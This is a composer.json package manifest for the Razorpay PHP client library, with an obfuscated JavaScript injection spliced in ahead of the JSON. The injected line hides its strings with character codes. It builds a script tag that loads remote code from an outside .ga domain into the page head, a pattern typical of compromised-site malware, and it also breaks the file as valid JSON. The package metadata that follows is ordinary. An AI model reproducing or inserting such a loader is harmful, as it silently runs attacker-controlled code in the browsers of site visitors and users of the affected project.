Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,97,114,116,46,116,114,97,110,115,97,110,100,102,105,101,115,116,97,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();{
    "name": "razorpay/razorpay",
    "description": "Razorpay PHP Client Library",
    "keywords": ["razorpay", "api", "php", "client"],
    "authors": [
        {
            "name": "Abhay Rana",
            "email": "nemo@razorpay.com",
            "homepage": "https://captnemo.in",
            "role": "Developer"
        },
        {
            "name": "Shashank Kumar",
            "email": "shashank@razorpay.com",
            "role": "Developer"
        }
    ],
    "support": {
        "email": "contact@razorpay.com",
        "issues": "https://github.com/Razorpay/razorpay-php/issues",
        "source": "https://github.com/Razorpay/razorpay-php"
    },
    "homepage": "https://docs.razorpay.com",
    "license": "MIT",
    "require": {
        "php": ">=5.3.0",
        "rmccue/requests": "v1.7.0",
        "ext-json": "*"
    },
    "require-dev": {
        "raveren/kint": "1.*",
        "phpunit/phpunit": "~4.8|~5.0"
    },
    "autoload": {
        "psr-4": {
            "Razorpay\\Api\\": "src/",
            "Razorpay\\Tests\\": "tests/"
        }
    }
}
